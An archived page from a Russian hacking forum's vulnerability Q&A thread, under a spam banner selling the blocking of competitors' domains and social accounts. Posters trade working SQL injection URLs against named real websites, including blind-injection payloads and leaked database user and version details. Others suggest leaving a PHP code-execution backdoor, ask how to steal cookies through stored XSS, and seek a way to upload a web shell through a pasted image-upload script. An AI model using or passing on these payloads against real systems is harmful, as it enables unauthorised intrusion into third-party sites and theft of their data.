УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1796 из 2438

1796

Опции темы

Поиск в этой теме

Опции просмотра

#17951

19.08.2011, 22:44

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от DJ

[akep"]
DJ ][akep said:
Вот вспоминл)) Я о этом имел ввиду

Я думаю лучше в качестве бекдора оставить не инклуд, а выполнение произвольного php кода, например

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]

Вызывается так: php?code=phpinfo();

Можно придумать миллион других примеров.

#17952

20.08.2011, 00:53

kokes

Guest

Сообщений: n/a

Провел на форуме:
285

Репутация: 0

Код:

Code:
http://modcos.com/news.php?id=42

нашол количество столбцов - 6

но немогу вывести названия, все что пише откидаеться и бросает на главную страницу.

в чем причина?

#17953

20.08.2011, 03:10

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от kokes

kokes said:

Код:

Code:
http://modcos.com/news.php?id=42

нашол количество столбцов - 6
но немогу вывести названия, все что пише откидаеться и бросает на главную страницу.
в чем причина?

Там WAF, на связку UNION SELECT и при встрече OR, т.е. ORDER попадает тоже под фильтр.

Ну... Крути как Blind:

http://modcos.com/news.php?id=42+and+substring(version(),1,1)=5 - Валидный запрос

http://modcos.com/news.php?id=42+and+substring(version(),1,1)=4 - FALSE

Когда запрос вовзращает TRUE, то выводятся там все комментарии. Можно раскрутить как Blind.

user() \ 033038003_adminm@localhost

version() \ 5.0.67-percona-highperf-b7-log

database() \ babinsoft_modcos

#17954

20.08.2011, 03:43

reddim

Guest

Сообщений: n/a

Провел на форуме:
1048

Репутация: 0

вообщем случайно нашел активную хсс

и не понимаю как сделать так что бы воровались куки на форуме

Сама активка на главной странице сайта site.com

Если я кину сылку на форуме (на главную страницу с хсс)..это как бы получится пасивка же..как сделать в такой ситуации что бы при просмотре темы на форуме выполнялась активка?

И какой толк в таких активках, например в поле имя при регистрации итд?

#17955

20.08.2011, 14:52

Dr..VATSON

Новичок

Регистрация: 07.12.2008

Сообщений: 12

Провел на форуме:
487591

Репутация: 43

reddim

Больше информации тебе в этой теме ни кто не даст, читай маны.

Тут всё написано /thread20140.html

#17956

20.08.2011, 21:23

Samael91

Guest

Сообщений: n/a

Провел на форуме:
14366

Репутация: 0

Подскажите почему не выводиться содержимое колонок?

http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from +users--

#17957

20.08.2011, 21:36

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от Samael91

Samael91 said:
Подскажите почему не выводиться содержимое колонок?
http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from +users--

там нет такой таблички..потому и не выводит

#17958

20.08.2011, 21:38

COOLBOY007

Новичок

Регистрация: 09.06.2009

Сообщений: 9

Провел на форуме:
72074

Репутация: 0

Отправить сообщение для COOLBOY007 с помощью ICQ

Samael91, таблица `users` находится в БД `test_base`, текущая - `zorro_feb`.

Код:

Code:
http://www.feb.spb.ru/news.php?id=100+union+select+1,name,3,4,5,6,7+from+test_base.users+limit+1,1+--+

#17959

21.08.2011, 01:20

plaeer

Guest

Сообщений: n/a

Провел на форуме:
34360

Репутация: 1

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]$height[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$newheight[/COLOR][COLOR="#007700"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/a>"[/COLOR][COLOR="#007700"]);

if (![/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]) and[/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])

die([/COLOR][COLOR="#0000BB"]$lerror2[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"  "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$ext[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]"jpg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"jpeg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"JPG"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"JPEG"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"gif"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"GIF"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"png"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"PNG"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"];

if (![/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"])),[/COLOR][COLOR="#0000BB"]$ext[/COLOR][COLOR="#007700"]))

die([/COLOR][COLOR="#0000BB"]$lerror3[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"  "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nazi[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]());

if ([/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"]);

else

[/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$upl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);

if ([/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_xxx."[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]);

else

[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$file_name[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_ext[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_URI'[/COLOR][COLOR="#007700"]]);

foreach([/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$key[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"])    {

if ([/COLOR][COLOR="#0000BB"]end[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$http[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]$val[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$file_to_upload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upl[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]];

if (isset([/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"])){

[/COLOR][COLOR="#0000BB"]$file_to_upload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$upload_url[/COLOR][COLOR="#007700"];

}

include([/COLOR][COLOR="#DD0000"]"admin/config.php"[/COLOR][COLOR="#007700"]);

if([/COLOR][COLOR="#0000BB"]$js[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

{

[/COLOR][COLOR="#0000BB"]$jsc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"rel='lightbox'"[/COLOR][COLOR="#007700"];

}

else

{

[/COLOR][COLOR="#0000BB"]$jsc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#0000BB"]$http_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$http[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"upload_image/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$http_thumb_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"http://"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_HOST'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$http[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"upload_image/thumb/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_to_upload[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"upload_image/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]))    {

[/COLOR][COLOR="#0000BB"]resizeimаgе[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"upload_image/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"upload_image/thumb/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$thumb_size[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$thumb_size[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#DD0000"]"Error!"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$lyzezagry[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" 
  "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$leve[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"

"[/COLOR][COLOR="#007700"];

if ([/COLOR][COLOR="#0000BB"]$xxx[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Изображение доступно только для лиц лет 
  Загрузить еще

"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"BBCode:
"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"

"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"HTML:
"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"\">

"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ladressiii[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]":
"[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"

  "[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"];

}

else

die([/COLOR][COLOR="#0000BB"]$lerror2[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]

Скрипт заливки изображений, хочу чрез его залить шелл. Можно обойти фильтрацию?

#17960

21.08.2011, 02:22

RexTiam

Постоянный

Регистрация: 02.11.2009

Сообщений: 341

Провел на форуме:
599124

Репутация: 65

фильтрация защищена от заливки вроде полностью. кстати даже очень хорошо написан код)

Страница 1796 из 2438

1796

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход